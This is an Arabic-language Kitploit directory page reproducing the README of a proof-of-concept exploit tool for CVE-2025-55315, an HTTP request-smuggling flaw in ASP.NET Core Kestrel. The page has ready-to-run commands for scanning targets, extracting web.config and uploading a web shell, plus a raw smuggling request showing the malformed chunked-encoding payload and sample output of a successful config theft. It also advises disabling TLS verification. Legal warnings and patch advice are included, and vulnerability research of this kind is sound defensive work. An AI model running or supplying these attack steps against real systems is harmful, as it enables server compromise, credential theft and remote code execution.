Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC Exploit | Kitploit
أدوات/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

عرض المستودع
859منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة اختبار الاختراق CVE-2025-55315

أداة استغلال تهريب طلبات HTTP لـ ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ تحذير قانوني

هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط!

  • استخدم فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • منشئ الأداة ليس مسؤولاً عن سوء الاستخدام
  • باستخدام هذه الأداة، فإنك تتحمل المسؤولية القانونية الكاملة

📋 نظرة عامة

أداة اختبار اختراق احترافية لـ CVE-2025-55315 (ثغرة تهريب طلبات HTTP في خادم ASP.NET Core Kestrel). صُممت هذه الأداة لتحليل هدف واحد مع إمكانيات استغلال شاملة.

ما هي CVE-2025-55315؟

ثغرة حرجة لتهريب طلبات HTTP في خادم الويب ASP.NET Core Kestrel (CVSS 9.9/10) تسمح للمهاجمين بـ:

  • تجاوز المصادقة
  • سرقة بيانات الاعتماد ورمز الجلسة
  • تنفيذ تزوير الطلبات من جانب الخادم (SSRF)
  • تسميم ذاكرة التخزين المؤقت
  • تحميل أوامر الويب والحصول على تنفيذ تعليمات برمجية عن بُعد

الإصدارات المتأثرة:

  • .NET Core 3.0 حتى .NET 9.0.9
  • تم الإصلاح في: .NET 8.0.21+، 9.0.10+، 10.0.0-rc2+

✨ الميزات

القدرات الأساسية

  • ✅ تحليل هدف واحد - اختبار اختراق مركّز على هدف محدد
  • ✅ اكتشاف تلقائي للنقاط النهائية - يكتشف نقاط النهاية الشائعة في ASP.NET Core
  • ✅ اختبار يدوي للنقاط النهائية - اختبار نقاط نهاية محددة محل الاهتمام
  • ✅ كشف الثغرات - كشف دقيق لـ CVE-2025-55315
  • ✅ استخراج web.config - قراءة ملفات التهيئة عبر تهريب الطلبات
  • ✅ تحميل أوامر الويب - إمكانية نشر أوامر الويب اختيارياً
  • ✅ إعداد تقارير مفصلة - تقارير بتنسيق JSON ونصي
  • ✅ ميزات الأمان - مطالبات تأكيد متعددة للإجراءات الضارة

الميزات التقنية

  • دعم HTTP/1.1 و HTTPS
  • دعم المنافذ المخصصة
  • مهلات قابلة للتكوين
  • وضع تصحيح مطوّل (verbose)
  • مخرجات طرفية ملونة
  • تجاوز التحقق من شهادة SSL (للاختبار)

🔧 التثبيت

المتطلبات

# Python 3.7 أو أعلى
python3 --version

# لا تبعيات خارجية - يستخدم المكتبة القياسية فقط

التحميل

# استنساخ أو تحميل الأداة
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# جعلها قابلة للتنفيذ
chmod +x cve_2025_55315_PoC.py

🚀 بداية سريعة

فحص الثغرات الأساسي

python3 cve_2025_55315_PoC.py -t target.com

سيؤدي هذا إلى:

  1. جمع معلومات الخادم
  2. اكتشاف النقاط النهائية النشطة تلقائياً
  3. اختبار كل نقطة نهاية بحثاً عن CVE-2025-55315
  4. عرض النتائج في الطرفية

اختبار نقطة نهاية محددة

python3 cve_2025_55315_PoC.py -t target.com -e /api/login

فحص كامل مع استخراج web.config

python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

متقدم: استغلال كامل (مصرح به فقط!)

python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 أمثلة الاستخدام

المثال 1: فحص سريع

السيناريو: التحقق مما إذا كان خادم الإنتاج معرضاً للثغرة

python3 cve_2025_55315_PoC.py -t api.mycompany.com

المدة المتوقعة: 30-60 ثانية


المثال 2: فحص مفصل

السيناريو: فحص شامل للنقاط النهائية مع مخرجات مطولة

python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

المدة المتوقعة: 2-5 دقائق


المثال 3: استهداف نقاط نهاية متعددة

السيناريو: اختبار نقاط نهاية حرجة محددة

python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

المثال 4: هدف بدون SSL

السيناريو: اختبار خادم HTTP داخلي

python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 خيارات سطر الأوامر

usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

وسائط إلزامية:
  -t, --target         اسم المضيف الهدف أو URL (مثال: target.com)

وسائط اختيارية:
  -p, --port           رقم المنفذ (الافتراضي: 443 لـ SSL، 80 لغير SSL)
  -e, --endpoint       نقطة نهاية محددة لاختبارها (يمكن استخدامها عدة مرات)
  --no-ssl             تعطيل SSL/HTTPS (استخدام HTTP)
  --read-config        محاولة قراءة ملف web.config
  --upload-shell       محاولة تحميل أوامر الويب (يتطلب تأكيداً)
  -o, --output         حفظ التقرير في ملف
  -v, --verbose        تمكين المخرجات المطولة
  --timeout            مهلة المقبس بالثواني (الافتراضي: 10)
  -h, --help           عرض رسالة المساعدة

🔍 فهم المخرجات

مثال نظام معرض للثغرة

Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- معلومات الخادم ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- النقاط النهائية المعرضة (2) ---
  ✗ /api/login
    التفاصيل: نجاح تهريب الطلبات - استجابات متعددة
  ✗ /api/health
    التفاصيل: نجاح تهريب الطلبات - استجابات متعددة

--- الاستغلالات الناجحة ---
  ✓ web.config_read عبر /api/login

التفسير:

  • 🔴 تم اكتشاف ثغرة حرجة
  • 🔴 نقاط نهاية متعددة معرضة
  • 🔴 تم استخراج ملف التهيئة بنجاح
  • ⚡ عاجل: التحديث إلى .NET 8.0.21+ أو 9.0.10+

مثال نظام آمن

Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- معلومات الخادم ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ نقطة النهاية ليست معرضة (400 Bad Request)

✓ لم يتم العثور على نقاط نهاية معرضة - ربما تم تصحيح الهدف

التفسير:

  • ✅ النظام آمن
  • ✅ يعمل بإصدار Kestrel مصحح
  • ✅ تم رفض جميع الطلبات غير الصالحة

🛡️ الأمان والأخلاقيات

قائمة التحقق من التصريح

قبل تشغيل هذه الأداة، تأكد من:

  • أنك تملك النظام المستهدف، أو
  • لديك تصريح كتابي للاختبار، و
  • تم إخطار فريق الأمان، و
  • لديك خطة للتراجع، و
  • أنك تفهم الآثار القانونية

ميزات الأمان المدمجة

  1. تأكيد من مرحلتين - تطلب الأداة التصريح قبل البدء
  2. تأكيد تحميل أوامر الويب - يتطلب كتابة "YES" بالأحرف الكبيرة
  3. تحديد المعدل - تأخيرات بين الطلبات أثناء الاكتشاف التلقائي
  4. حماية المهلة - يمنع الاتصالات المعلقة
  5. تسجيل مفصل - يتم تسجيل جميع الإجراءات لمسار التدقيق

🔬 التفاصيل التقنية

تقنية الاستغلال

تستغل الأداة CVE-2025-55315 باستخدام ترميز نقل مجزأ (chunked) غير صالح:

POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← الثغرة: \n منفرد بدلاً من \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← يصبح هذا طلباً منفصلاً
Host: target.com

لماذا يعمل هذا:

  1. خادم الوكيل يرى \n كمحدد سطر → يعالج كطلب واحد
  2. Kestrel (الضعيف) يتجاهل \n → يعامل الطلب المهرب كطلب منفصل
  3. قد يتم تنفيذ الطلب المهرب في سياق جلسة مستخدم آخر

منطق الكشف

استجابة الخادمالتفسيرالحالة
400 Bad Requestرفض Kestrel للكتلة غير الصالحة✅ آمن (مصحح)
استجابات HTTP/1.1 متعددةتلقي استجابتين منفصلتين❌ معرض
500 أو 502خطأ خادم داخلي⚠️ يحتمل أن يكون معرضاً
200 OK عاديتم قبول الطلب⚠️ غير حاسم

🐛 استكشاف الأخطاء وإصلاحها

فشل الاتصال

[ERROR] Connection failed: [Errno 111] Connection refused

الحلول:

  • تحقق من إمكانية الوصول إلى الهدف: ping target.com
  • تحقق من صحة رقم المنفذ
  • جرب مع/بدون SSL: --no-ssl
  • تحقق من قواعد جدار الحماية

خطأ شهادة SSL

[ERROR] Connection failed: certificate verify failed

الحل: الأداة تقوم بالفعل بتعطيل التحقق من الشهادة. إذا استمرت المشكلة:

export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

أخطاء المهلة

[WARNING] No response - possible timeout
تنزيل الأداة